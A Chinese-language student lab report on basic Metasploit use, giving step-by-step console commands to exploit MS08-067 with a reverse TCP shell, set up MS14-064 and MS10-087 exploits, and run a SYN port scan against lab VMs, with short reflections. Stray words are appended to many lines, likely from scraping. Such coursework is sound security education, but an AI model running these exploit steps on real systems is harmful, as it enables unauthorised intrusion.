Exp5 MSF基礎應用

1.實踐目標

   本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell

  1.1一個主動攻擊實踐,如ms08_067;ms11_019_electbowser(惟一)(1分)

  1.2 一個針對瀏覽器的攻擊,如ms14_064;(1分)

  1.3 一個針對客戶端的攻擊,如Adobe;(1分)

  1.4 成功應用任何一個輔助模塊。(0.5分)

2.實踐內容

2.1一個主動攻擊實踐

Windows服務滲透攻擊——MS08-067安全漏洞

1.輸入msfconsolewindows

2.輸入search ms08_067進行搜索漏洞api

3.複製所在位置並使用,use exploit/windows/smb/ms08_067_netapi瀏覽器

4.輸入show options查看當前配置安全

5.進行配置依次輸入tcp

      set payload generic/shell_reverse_tcp編碼

      set rhost 192.168.215.129(靶機的IP)線程

6.輸入exploit進行監聽,成功,輸入dir進行查看3d

ms11_019_electbowser(惟一)

1.輸入msfconsolecode

 2.show options查看相關參數

 3.設定rhost 192.168.215.129(靶機)

2.2一個針對瀏覽器的攻擊

2.2.1瀏覽器滲透攻擊——ms14_064

初始步驟同上

1.設置payload

2.根據options裏的信息設置本機ip 92.168.215.128

3.設置uripath ms14064

4.設置lhost爲攻擊機ip 192.168.215.128

 

2.3一個針對客戶端的攻擊

2.3.1針對Office軟件的滲透攻擊——MS10-087

1.輸入search ms10_087並輸入use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

2.輸入set payload windows/exec(運行一個可執行文件)

3.輸入set CMD calc.exe(綁定計算器程序,進行啓動)

4.輸入exploit,進行攻擊

5.使用show options命令查看一些參數值,好比文件名、綁定程序等等。此時文件名爲默認,也能夠進行修改

2.4成功應用任何一個輔助模塊

1.輸入use auxiliary/scanner/portscan/syn(使用portscan模塊)

2.輸入show options

3.輸入set RHOST 192.168.183.129(目標)

4.輸入set THREADS 50(線程)

5.輸入exploit

 

3實驗後回答問題

(1)用本身的話解釋什麼是exploit,payload,encode。

  1. exploit:攻擊者利用漏洞的攻擊過程。
  2. payload:攻擊者在目標主機上執行的具備特定功能的代碼。
  3. encode:改變特徵碼的編碼器。

(2)離實戰還缺些什麼技術或步驟?

  • 能夠很明顯看出實驗的難點在尋找具備特定漏洞的虛擬機和利用一個和別人不同的漏洞,從實戰的角度來說,也就是說蒐集情報的手段和方法太過於落後,然而這也是攻擊的難點所在,畢竟修改options裏的項是簡單的。修改什麼;可否修改而須要作的信息準備是困難的。

4實驗心得體會

  • 此次實驗在前人的實驗報告的做用下已經沒了什麼難度,正如報告中的內容所展示的,這些漏洞都過於年代久遠了,對於須要與時俱進的咱們還有許多能夠進步的空間。
相關文章
相關標籤/搜索